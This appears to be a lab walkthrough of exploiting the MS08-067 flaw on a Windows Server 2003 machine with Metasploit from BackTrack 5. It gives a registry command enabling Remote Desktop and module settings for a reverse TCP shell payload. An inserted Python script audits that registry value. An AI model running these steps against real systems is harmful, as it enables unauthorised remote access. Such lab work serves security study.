Target machine: Win2k3

Attacker machine: BT5

One: use nmap to check that Win2k3 has port 3389 open


  How to enable 3389: My Computer -> Properties -> Remote


   Enabling port 3389 from the command line (any port):

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
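
For the defender's side of this setting, the following added example (not part of the original post) parses the text printed by reg query for the fDenyTSConnections value and reports the hosts where Remote Desktop is enabled. The host labels and sample outputs are constructed for illustration.

```python
import re

# Value name from the reg add command above; data 0 means RDP connections are allowed.
VALUE = "fDenyTSConnections"
LINE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(\S+)\s*$")

def rdp_state(reg_query_output):
    """Return 'enabled', 'disabled' or 'unknown' from `reg query` text."""
    for line in reg_query_output.splitlines():
        m = LINE.match(line)
        if not m or m.group(1).lower() != VALUE.lower():
            continue
        if m.group(2) != "REG_DWORD":
            return "unknown"           # unexpected type: do not guess
        try:
            data = int(m.group(3), 0)  # accepts 0x0 as well as plain decimal
        except ValueError:
            return "unknown"
        return "enabled" if data == 0 else "disabled"
    return "unknown"                   # value not present in the output

def audit(hosts):
    """Map host label -> state, and list the hosts where RDP is enabled."""
    states = {h: rdp_state(out) for h, out in hosts.items()}
    return states, sorted(h for h, s in states.items() if s == "enabled")

# Constructed sample outputs (hypothetical host labels, not captured from real hosts).
KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
SAMPLES = {
    "lab-win2k3": f"\n{KEY}\n    fDenyTSConnections    REG_DWORD    0x0\n",
    "lab-server2": f"\n{KEY}\n\tfDenyTSConnections\tREG_DWORD\t0x1\n",
    "lab-server3": "ERROR: The system was unable to find the specified registry key or value.\n",
}

if __name__ == "__main__":
    states, exposed = audit(SAMPLES)
    for host, state in states.items():
        print(f"{host}: RDP {state}")
    print("RDP enabled on:", exposed)
```
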

Two: Attack phase

  1. Search for the ms08_067 vulnerability module


  2. Use the ms08_067_netapi exploit module

  3. List the payloads available for this exploit module


  4. View the options and set the required parameters


set payload generic/shell_reverse_tcp  # set the payload to use

show options # view the parameters the module requires


set RHOST # set the target host
set LHOST # set this (attacker) machine
set LPORT 5000 # set the port used for the connection between the attacker and the target
show targets
set target 7 # show targets lists the Windows versions the exploit supports; set the index that corresponds to the target host

5. Start the attack


You can see that the shell is already in a directory on the Win2k3 C: drive.

